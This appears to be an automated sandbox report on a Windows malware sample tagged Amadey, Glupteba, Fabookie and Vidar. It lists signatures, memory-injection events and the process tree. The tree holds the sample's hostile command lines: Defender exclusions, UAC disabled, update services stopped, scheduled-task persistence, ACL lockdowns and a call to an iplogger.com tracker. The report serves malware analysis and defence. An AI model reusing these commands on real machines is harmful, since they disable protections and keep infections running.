Malware Analysis Report

2025-01-02 08:25

Sample ID 231005-ffzd9agg4x
Target daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95
SHA256 daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95
Tags
upx amadey fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 dropper evasion loader spyware stealer trojan discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95

Threat Level: Known bad

The file daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95 was found to be: Known bad.

Malicious Activity Summary

upx amadey fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 dropper evasion loader spyware stealer trojan discovery persistence

Glupteba

Fabookie

Amadey

Vidar

Detect Fabookie payload

UAC bypass

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Drops startup file

Executes dropped EXE

.NET Reactor protector

Checks installed software on the system

Checks whether UAC is enabled

Enumerates connected drives

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Kills process with taskkill

Modifies registry class

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

System policy modification

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 04:49

Signatures

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 04:49

Reported

2023-10-05 04:54

Platform

win7-20230831-en

Max time kernel

16s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | N/A

Vidar

stealer vidar

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor protector

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QAwjc1JRJ7yjLTfMcjxH2Z6z.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zOjGNBYEg1t2u1KnQmyRozqC.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DElMobLUf1TASdDY6A2lD2lZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0Mx8xIFrDPnJY7RyL1qWrEgJ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KwWxikOG0KnNYBDpW1woYiju.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9vtrapQnDWM0uDcviiJKPoO2.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9Q4juvZVk4TBjvuU04fFcuoT.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uup0gVqyki7L7wpGufbQCxmV.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wLWAlBOVHo0nyjZtqDBu2X9H.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I4pRKYMcRL6yFFCuZS2nzJLo.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\plwoBRHap8pQzIRMrU7ahGbq.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7360021604.exe

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2076 wrote to memory of 2020 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2020 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2020 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2668 wrote to memory of 2592 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2592 wrote to memory of 904 | N/A | C:\Windows\system32\rundll32.exe | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 | N/A | C:\Windows\system32\rundll32.exe | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 | N/A | C:\Windows\system32\rundll32.exe | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 | N/A | C:\Windows\system32\rundll32.exe | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2668 wrote to memory of 440 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 904 wrote to memory of 956 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\System32\powercfg.exe
PID 2668 wrote to memory of 1376 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 904 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 2308 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 1028 wrote to memory of 2160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 900 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 1028 wrote to memory of 2228 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\System32\powercfg.exe
PID 1028 wrote to memory of 2228 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\System32\powercfg.exe

System policy modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

"C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe"

C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

"C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

"C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

"C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe"

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

"C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe"

C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

"C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

"C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe"

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

"C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

"C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe

"C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp

"C:\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp" /SL5="$D0126,491750,408064,C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8B26D978-1E26-441F-B45B-4EA5CE0FB424} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005045006.log C:\Windows\Logs\CBS\CbsPersist_20231005045006.cab

C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe

"C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe

"C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe"

C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp" /SL5="$201EA,833775,56832,C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 392

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:275457 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

"C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7360021604.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\7360021604.exe

"C:\Users\Admin\AppData\Local\Temp\7360021604.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7863273423.exe"

C:\Users\Admin\AppData\Local\Temp\7863273423.exe

"C:\Users\Admin\AppData\Local\Temp\7863273423.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2389231104.exe"

C:\Users\Admin\AppData\Local\Temp\2389231104.exe

"C:\Users\Admin\AppData\Local\Temp\2389231104.exe"

C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

"C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe"

